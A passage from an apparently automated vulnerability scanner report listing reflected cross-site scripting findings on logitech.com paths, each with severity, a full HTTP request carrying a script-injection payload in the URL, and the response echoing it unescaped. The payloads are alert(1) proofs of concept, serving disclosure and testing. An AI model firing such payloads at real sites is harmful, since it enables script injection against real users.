Server: Apache
Date: Fri, 12 Nov 2010 13:02:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','777b6</script><script>alert(1)</script>190bc790f22/9653' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.d
...[SNIP]...

1.105. http://www.logitech.com/css/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 130ab</script><script>alert(1)</script>fdd4ea32bae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css130ab</script><script>alert(1)</script>fdd4ea32bae/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css130ab</script><script>alert(1)</script>fdd4ea32bae' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.106. http://www.logitech.com/css/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7337e"><script>alert(1)</script>9c46007eace was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /css7337e"><script>alert(1)</script>9c46007eace/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css7337e"><script>alert(1)</script>9c46007eace">
...[SNIP]...

1.107. http://www.logitech.com/css/v2/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64ab5"><script>alert(1)</script>2a41a44e873 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /css64ab5"><script>alert(1)</script>2a41a44e873/v2/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css64ab5"><script>alert(1)</script>2a41a44e873/v2">
...[SNIP]...

1.108. http://www.logitech.com/css/v2/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7780a</script><script>alert(1)</script>e71e113e370 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css7780a</script><script>alert(1)</script>e71e113e370/v2/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css7780a</script><script>alert(1)</script>e71e113e370/v2' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcs
...[SNIP]...

1.109. http://www.logitech.com/css/v2/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66455</script><script>alert(1)</script>93d408639fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v266455</script><script>alert(1)</script>93d408639fe/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v266455</script><script>alert(1)</script>93d408639fe' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.110. http://www.logitech.com/css/v2/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c8ec"><script>alert(1)</script>236c4f2a2fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /css/v22c8ec"><script>alert(1)</script>236c4f2a2fb/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v22c8ec"><script>alert(1)</script>236c4f2a2fb">
...[SNIP]...

1.111. http://www.logitech.com/css/v2/category.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/category.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69747</script><script>alert(1)</script>2ead2981d11 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2/category.css69747</script><script>alert(1)</script>2ead2981d11 HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/en-us/webcam-communications
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:51:22 GMT
Connection: keep-alive
Content-Length: 31425


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2/category.css69747</script><script>alert(1)</script>2ead2981d11' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.112. http://www.logitech.com/css/v2/category.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/category.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69eaa"><script>alert(1)</script>b98875c86ce was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/v2/category.css69eaa"><script>alert(1)</script>b98875c86ce HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/en-us/webcam-communications
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:51:15 GMT
Connection: keep-alive
Content-Length: 31393


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2/category.css69eaa"><script>alert(1)</script>b98875c86ce">
...[SNIP]...

1.113. http://www.logitech.com/css/v2/category_ie.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/category_ie.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 677bf"><script>alert(1)</script>08d1a2cfc0a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /css/v2/category_ie.css677bf"><script>alert(1)</script>08d1a2cfc0a HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/en-us/webcam-communications
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:51:31 GMT
Connection: keep-alive
Content-Length: 31408


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2/category-ie.css677bf"><script>alert(1)</script>08d1a2cfc0a">
...[SNIP]...

1.114. http://www.logitech.com/css/v2/category_ie.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/category_ie.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19b2e</script><script>alert(1)</script>b9fd6cf839a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2/category_ie.css19b2e</script><script>alert(1)</script>b9fd6cf839a HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/en-us/webcam-communications
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:51:47 GMT
Connection: keep-alive
Content-Length: 31440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2/category-ie.css19b2e</script><script>alert(1)</script>b9fd6cf839a' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.115. http://www.logitech.com/css/v2/category_print.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/category_print.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bdd9"><script>alert(1)</script>cfac07b515 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /css/v2/category_print.css1bdd9"><script>alert(1)</script>cfac07b515 HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/en-us/webcam-communications
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:51:34 GMT
Connection: keep-alive
Content-Length: 31418


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2/category-print.css1bdd9"><script>alert(1)</script>cfac07b515">
...[SNIP]...

1.116. http://www.logitech.com/css/v2/category_print.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/category_print.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21c2e</script><script>alert(1)</script>1fa3f266cb1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2/category_print.css21c2e</script><script>alert(1)</script>1fa3f266cb1 HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/en-us/webcam-communications
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:51:50 GMT
Connection: keep-alive
Content-Length: 31455


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2/category-print.css21c2e</script><script>alert(1)</script>1fa3f266cb1' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.117. http://www.logitech.com/css/v2/cmn/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ebd52</script><script>alert(1)</script>cffdcf4e525 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cssebd52</script><script>alert(1)</script>cffdcf4e525/v2/cmn/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','cssebd52</script><script>alert(1)</script>cffdcf4e525/v2/cmn' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS
...[SNIP]...

1.118. http://www.logitech.com/css/v2/cmn/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6297"><script>alert(1)</script>71e93c23446 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cssf6297"><script>alert(1)</script>71e93c23446/v2/cmn/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="cssf6297"><script>alert(1)</script>71e93c23446/v2/cmn">
...[SNIP]...

1.119. http://www.logitech.com/css/v2/cmn/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e584a</script><script>alert(1)</script>b00ac24ac15 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2e584a</script><script>alert(1)</script>b00ac24ac15/cmn/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2e584a</script><script>alert(1)</script>b00ac24ac15/cmn' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dc
...[SNIP]...

1.120. http://www.logitech.com/css/v2/cmn/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5b35"><script>alert(1)</script>64bd4772672 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /css/v2f5b35"><script>alert(1)</script>64bd4772672/cmn/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2f5b35"><script>alert(1)</script>64bd4772672/cmn">
...[SNIP]...

1.121. http://www.logitech.com/css/v2/cmn/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73b37"><script>alert(1)</script>aa30ad21361 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /css/v2/cmn73b37"><script>alert(1)</script>aa30ad21361/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
